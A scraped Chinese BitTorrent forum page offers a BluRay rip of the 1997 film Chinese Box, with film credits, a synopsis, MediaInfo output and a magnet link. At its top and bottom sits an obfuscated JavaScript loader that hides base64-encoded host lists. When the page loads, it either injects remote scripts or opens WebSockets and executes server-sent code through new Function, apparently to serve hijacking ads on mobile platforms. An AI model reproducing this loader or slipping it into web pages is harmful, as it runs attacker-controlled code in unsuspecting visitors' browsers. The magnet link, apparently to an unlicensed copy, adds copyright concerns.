中国匣[简繁字幕].Chinese.Box.1997.BluRay.1080p.DTS-HD.MA.2.0.x265.10bit 10.88GB

版主小s 23天前 230

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译  名 中国匣 / 中国盒子 / 情人盒子
◎片  名 Chinese Box
◎年  代 1997
◎产  地 法国 / 日本 / 美国
◎类  别 剧情 / 爱情
◎语  言 英语 / 粤语
◎上映日期 1997-09-04(威尼斯电影节) / 1997-11-19(法国)
◎IMDb链接 https://www.imdb.com/title/tt0118851/
◎豆瓣评分 6.7/10 (2207人评价)
◎豆瓣链接 https://movie.douban.com/subject/1296374/
◎片  长 99 分钟
◎导  演 王颖 Wayne Wang (id:1014195)
◎编  剧 让-克劳德·卡里埃尔 Jean-Claude Carrière (id:1050366)
       拉里·格罗斯 Larry Gross (id:1285526)
       Paul Theroux Paul Theroux (id:1000892)
       王颖 Wayne Wang (id:1014195)
◎演  员 杰瑞米·艾恩斯 Jeremy Irons (id:1031216)
       巩俐 Li Gong (id:1035641)
       张曼玉 Maggie Cheung (id:1274231)
       许冠文 Michael Koon Man Hui (id:1050534)
       卢宾·布雷兹 Rubén Blades (id:1009458)
       杰瑞德·哈里斯 Jared Harris (id:1049700)
       卓别林·张 Chaplin Chang (id:1354537)
       张锦程 Emotion Cheung (id:1313425)
       卢雄 Paul Lo (id:1377025)
       玛利亚 Maria Cordero (id:1281277)
       鲍方 Fong Pau (id:1044120)
       许芬 Fan Hui (id:1330727)
       林敏骢 Man-Chung Lam (id:1289295)
       李兆基 Siu-Kei Lee (id:1275475)
       何超仪 Josie Ho (id:1014212)
       弗朗克西斯·周 Fran?ois Chau (id:1069449)
       江锦荣 Turbo Kong (id:1155219)
       麦克·里德 Mike Leeder (id:1382791)
       拉尔夫李斯特 Ralph Lister (id:1225604)
       托尼·布莱尔 Tony Blair (id:1045373)
       杰姆斯·黄 James Huang (id:1016841)
       金佩恩 Kim Penn (id:1391249)
       吴康宁 Hong-Ning Ng (id:1447771)
       让-路易斯·皮尔 Jean-Louis Piel (id:1294501)
       海蒂·莱维特 Heidi Levitt (id:1289921)
       王颖 Wayne Wang (id:1014195)
       莉迪亚·迪恩·皮尔彻 Lydia Dean Pilcher (id:1282112)
       格里莫·瑞维尔 Graeme Revell (id:1028103)
       Vilko Filac Vilko Filac (id:1008269)
       克里斯托弗·泰利弗森 Christopher Tellefsen (id:1299036)
       黄海光 Chris Wong (id:1301192)
       陈顾方 Shirley Chan (id:1280438)

◎标  签 巩俐 / 张曼玉 / 香港 / 王颖 / 美国 / 1997 / JeremyIrons / Jeremy_Irons

◎简  介
  John (杰瑞米艾伦斯饰)是一个在香港生活多年的英国摄影师;他的朋友Jim (罗宾布雷兹饰)经常光顾他的公寓. John迷恋酒吧主的女友Vivian (巩俐饰),但一直被她拒绝.就在香港回归之际, John发现自己患上了一种奇怪的白血病并且只剩下几个月的命.于是John, Jim,和一个他们在街上遇见的神秘女子Jean(张曼玉饰)开始用一个相机到处拍摄香港的景象,要在香港回归的最后一刻拍到真正的香港......

◎获奖情况 (共2项)
  第54届威尼斯电影节 (1997)
  主竞赛单元 金狮奖 (提名)
   └──王颖 (id:1014195)
  金奥赛拉奖 最佳配乐
   └──格里莫·瑞维尔 (id:1028103)

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 166396369207160752756853999319683291433 (0x7D2EC6670312FBC13F68AFE60975D929)
  4. Complete name                            : [email protected]DDQ.COM.mkv
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 10.9 GiB
  8. Duration                                 : 1 h 39 min
  9. Overall bit rate mode                    : Variable
  10. Overall bit rate                         : 15.7 Mb/s
  11. Encoded date                             : UTC 2021-11-06 11:41:10
  12. Writing application                      : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit
  13. Writing library                          : libebml v1.4.0 + libmatroska v1.6.1
  14. Video
  15. ID                                       : 1
  16. Format                                   : HEVC
  17. Format/Info                              : High Efficiency Video Coding
  18. Format profile                           : Main [email protected]@High
  19. Codec ID                                 : V_MPEGH/ISO/HEVC
  20. Duration                                 : 1 h 39 min
  21. Bit rate                                 : 13.7 Mb/s
  22. Width                                    : 1 920 pixels
  23. Height                                   : 1 038 pixels
  24. Display aspect ratio                     : 1.85:1
  25. Frame rate mode                          : Constant
  26. Frame rate                               : 24.000 FPS
  27. Color space                              : YUV
  28. Chroma subsampling                       : 4:2:0
  29. Bit depth                                : 10 bits
  30. Bits/(Pixel*Frame)                       : 0.287
  31. Stream size                              : 9.52 GiB (87%)
  32. Title                                    : HEVC, [email protected]@High, 24 fps @ 13710 kbps
  33. Writing library                          : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit
  34. Encoding settings                        : cpuid=533541111039 / frame-threads=3 / numa-pools=8 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x1038 / interlace=0 / total-frames=143091 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=21.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0
  35. Language                                 : English
  36. Default                                  : Yes
  37. Forced                                   : No
  38. Color range                              : Limited
  39. Color primaries                          : BT.709
  40. Transfer characteristics                 : BT.709
  41. Matrix coefficients                      : BT.709
  42. Audio #1
  43. ID                                       : 2
  44. Format                                   : DTS XLL
  45. Format/Info                              : Digital Theater Systems
  46. Commercial name                          : DTS-HD Master Audio
  47. Codec ID                                 : A_DTS
  48. Duration                                 : 1 h 39 min
  49. Bit rate mode                            : Variable
  50. Bit rate                                 : 1 716 kb/s
  51. Channel(s)                               : 2 channels
  52. Channel layout                           : L R
  53. Sampling rate                            : 48.0 kHz
  54. Frame rate                               : 93.750 FPS (512 SPF)
  55. Bit depth                                : 24 bits
  56. Compression mode                         : Lossless
  57. Stream size                              : 1.19 GiB (11%)
  58. Title                                    : English DTS-HD Master Audio 2.0 @ 1717 kbps
  59. Language                                 : English
  60. Default                                  : Yes
  61. Forced                                   : No
  62. Audio #2
  63. ID                                       : 3
  64. Format                                   : AC-3
  65. Format/Info                              : Audio Coding 3
  66. Commercial name                          : Dolby Digital
  67. Codec ID                                 : A_AC3
  68. Duration                                 : 1 h 39 min
  69. Bit rate mode                            : Constant
  70. Bit rate                                 : 192 kb/s
  71. Channel(s)                               : 2 channels
  72. Channel layout                           : L R
  73. Sampling rate                            : 48.0 kHz
  74. Frame rate                               : 31.250 FPS (1536 SPF)
  75. Compression mode                         : Lossy
  76. Stream size                              : 136 MiB (1%)
  77. Title                                    : English Dolby Digital Audio 2.0 @ 192 kbps  Commentary
  78. Language                                 : English
  79. Service kind                             : Complete Main
  80. Default                                  : No
  81. Forced                                   : No
  82. Text #1
  83. ID                                       : 4
  84. Format                                   : PGS
  85. Codec ID                                 : S_HDMV/PGS
  86. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  87. Duration                                 : 1 h 34 min
  88. Bit rate                                 : 23.2 kb/s
  89. Count of elements                        : 2890
  90. Stream size                              : 15.8 MiB (0%)
  91. Title                                    : Eng/SUP
  92. Language                                 : English
  93. Default                                  : No
  94. Forced                                   : No
  95. Text #2
  96. ID                                       : 5
  97. Format                                   : PGS
  98. Codec ID                                 : S_HDMV/PGS
  99. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  100. Duration                                 : 1 h 31 min
  101. Bit rate                                 : 14.9 kb/s
  102. Count of elements                        : 2034
  103. Stream size                              : 9.76 MiB (0%)
  104. Title                                    : Chs/SUP  简体
  105. Language                                 : Chinese
  106. Default                                  : Yes
  107. Forced                                   : No
  108. Text #3
  109. ID                                       : 6
  110. Format                                   : PGS
  111. Codec ID                                 : S_HDMV/PGS
  112. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  113. Duration                                 : 1 h 31 min
  114. Bit rate                                 : 15.4 kb/s
  115. Count of elements                        : 2034
  116. Stream size                              : 10.1 MiB (0%)
  117. Title                                    : Cht/SUP  繁体
  118. Language                                 : Chinese
  119. Default                                  : No
  120. Forced                                   : No
  121. Menu
  122. 00:00:00.000                             : en:第 01 章
  123. 00:04:00.500                             : en:第 02 章
  124. 00:12:54.667                             : en:第 03 章
  125. 00:21:19.542                             : en:第 04 章
  126. 00:28:59.625                             : en:第 05 章
  127. 00:39:29.917                             : en:第 06 章
  128. 00:49:28.500                             : en:第 07 章
  129. 00:57:58.375                             : en:第 08 章
  130. 01:07:53.542                             : en:第 09 章
  131. 01:18:10.667                             : en:第 10 章
  132. 01:26:47.417                             : en:第 11 章
  133. 01:35:18.167                             : en:第 12 章
复制代码




TAGS 剧情 爱情

磁力链:
  • magnet:?xt=urn:btih:C2AAB8116354DF711276049E68358E3AE65CEE0C

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};